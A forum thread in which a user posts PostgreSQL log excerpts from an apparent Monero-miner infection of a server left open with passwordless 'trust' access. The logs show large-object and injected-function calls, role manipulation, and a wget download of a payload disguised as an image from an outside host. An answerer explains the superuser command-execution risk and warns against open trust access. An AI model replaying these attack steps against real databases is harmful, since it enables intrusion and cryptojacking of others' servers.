Answer the question
In order to leave comments, you need to log in
P
P
Pavel Nekrasov2018-04-03 14:13:44
Pavel Nekrasov, 2018-04-03 14:13:44
How does the monero virus distributed via postgresql work?
I somehow opened the postgesql server for all connections 0.0.0.0/0 trust i.e. come in whoever you want without a password.
And this is what appeared in the logs
[18419-1] [email protected] ERROR: large object 4000006040 does not exist
[18419-2] [email protected] STATEMENT: select lo_unlink(4000006040)
[18419-3] [email protected] ERROR: function obj4000006040( bigint, unknown) does not exist at character 8
[18419-4] [email protected] HINT: No function matches the given name and argument types. You might need to add explicit type casts.
[18419-5] [email protected] STATEMENT: select obj4000006040(4000006040, './tmp4000006040');
WARNING: you should run this program as super-user.
WARNING: output may be incomplete or inaccurate, you should run this program as super-user.
[18419-6] [email protected] ERROR: role "e894c9c8" already
exists
[18419-8] [email protected] ERROR: role "e894c9c8" already
exists
img1.imagehousing.com/0/art-981754.png
Resolving img1.imagehousing.com (img1.imagehousing.com)... 104.27.181.36, 104.27.180.36, 2400:
Connecting to img1.imagehousing.com (img1.imagehousing.com)|104.27.181.36|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 517120 (505K) [image/png]
Saving to: 'flagdspo.jpg'
0K .......... ......... .......... .......... .......... 9% 40.9M 0s
50K .......... ... ....... .......... .......... .......... 19% 89.3M 0s
100K ....... ... .......... .......... .......... .......... 29% 66.1M 0s
150K . ......... .......... .......... .......... .......... 39 % 137M 0s
200K .......... .......... .......... .......... ...... .... 49% 65.9M 0s
250K .......... .......... .......... .......... ..........59% 77.2M 0s
300K .......... .......... .......... .......... ......... .69% 88.6M 0s
350K .......... .......... .......... .......... ... ....... 79% 83.7M 0s
400K .......... .......... .......... ....... ... .......... 89% 136M 0s
450K .......... .......... .......... .. ........ .......... 99% 76.2M 0s
500K ..... 100% 143M=0.006s
(77.4 MB/s) - 'flagdspo.jpg' saved [517120
[ 29796-10 ]
postgres
@postgres ERROR: role "pgsql" does not exist
[
29796 -11] [email protected] STATEMENT: DROP USER pgsql;
The file 4000006040 appeared in the /tmp/ folder, which is a monero client downloaded from the official github repository.
The question is actually what these commands are, and how this file appeared there, from the logs I don’t quite understand what the obj4000006040 function is, its presence would clarify everything. On the Internet I did not find a description of such a distribution method.
1 answer(s)
@freeart
M
Melkij, 2018-04-03 @freeart
Everything is obvious:
the base superuser is a trusted person and the base trusts this user. And the superuser in many tricky and not very ways is able to do everything with the server on which the database is running that the user running postgres has enough rights to do.
For example, run any arbitrary command, even the simple and obvious copy command, not to mention some perversions.
The specific attack has apparently already been sorted out and described here: https://habrahabr.ru/post/351452/
Never use trust, especially in the world. In the normal state, the base should not be open to the world at all.
Similar questions
O
A
G
S
superkolya2019-01-30 20:49:12
How to get a selection from the same table for different conditions?
1Reply
P
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question